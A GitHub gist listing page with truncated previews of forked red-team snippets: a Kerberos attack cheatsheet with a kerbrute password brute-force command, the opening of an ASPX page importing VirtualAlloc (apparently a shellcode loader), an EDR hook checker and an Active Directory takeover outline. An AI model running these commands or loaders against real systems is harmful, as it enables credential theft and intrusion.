bravery9
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ```cs | |
| <%@ Page Language="C#" AutoEventWireup="true" %> | |
| <%@ Import Namespace="System.IO" %> | |
| <%@ Import Namespace="System.Security.Cryptography" %> | |
| <script runat="server"> | |
| [System.Runtime.InteropServices.DllImport("kernel32")] | |
| private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); | |
| [System.Runtime.InteropServices.DllImport("kernel32")] |
bravery9
/ Red-Teaming-tool.md
Created
March 28, 2023 01:16
— forked from z0rs/Red-Teaming-tool.md
bravery9
/ kerberos_attacks_cheatsheet.md
Created
October 27, 2022 08:10
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
bravery9
/ upload.php
Created
January 10, 2022 16:20
— forked from taterbase/upload.php
Simple file upload in php
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Upload your files</title> | |
| </head> | |
| <body> | |
| <form enctype="multipart/form-data" action="upload.php" method="POST"> | |
| <p>Upload your file</p> | |
| <input type="file" name="uploaded_file"></input><br /> | |
| <input type="submit" value="Upload"></input> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| /* References | |
| * 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions | |
| * 2. https://github.com/Mr-Un1k0d3r/EDRs | |
| */ | |
| namespace SharpHookCheck | |
| { |
bravery9
/ Workstation-Takeover.md
Created
July 27, 2021 07:44
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
bravery9
/ OpenVPN Internet Proxy Windows.md
Created
November 15, 2020 04:21
— forked from ViRb3/OpenVPN Internet Proxy Windows.md
Create an OpenVPN Windows server that proxies internet traffic
Tested on Windows 10 x64, Anniversary Update
17.09.2017
-
Set up an OpenVPN connection following this guide
-
Generate a TA key and place it in the same folder as the other certificates/keys:
bravery9
/ proxy.md
Created
February 21, 2020 05:03
— forked from yougg/proxy.md
set http/socks/ssh proxy environment variables
# set http proxy
export http_proxy=http://127.0.0.1:8080
# set http proxy with user and password
export http_proxy=http://USERNAME:[email protected]:8080
# set http proxy with user and password (with special characters)
export http_proxy=http://`urlencode 'USERNAME'`:`urlencode 'PASSWORD'`@127.0.0.1:8080
bravery9
/ recompile-and-run.sh
Created
February 6, 2020 06:56
— forked from PuKoren/recompile-and-run.sh
Recompile APK + Sign with apktool
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # You must first install apktool (https://github.com/iBotPeaches/Apktool) and android SDK | |
| # and decompile apk using it | |
| # apktool d -rf my-app.apk | |
| # then generate a key for sign in: | |
| # keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000 | |
| rm signed-app.apk | |
| apktool b -f -d com.myapp | |
| jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore com.myapp/dist/com.myapp.apk alias_name | |
| zipalign -v 4 com.myapp/dist/com.myapp.apk signed-app.apk |
bravery9
/ how-to-oscp-final.md
Created
July 9, 2019 07:50
— forked from unfo/how-to-oscp-final.md
NewerOlder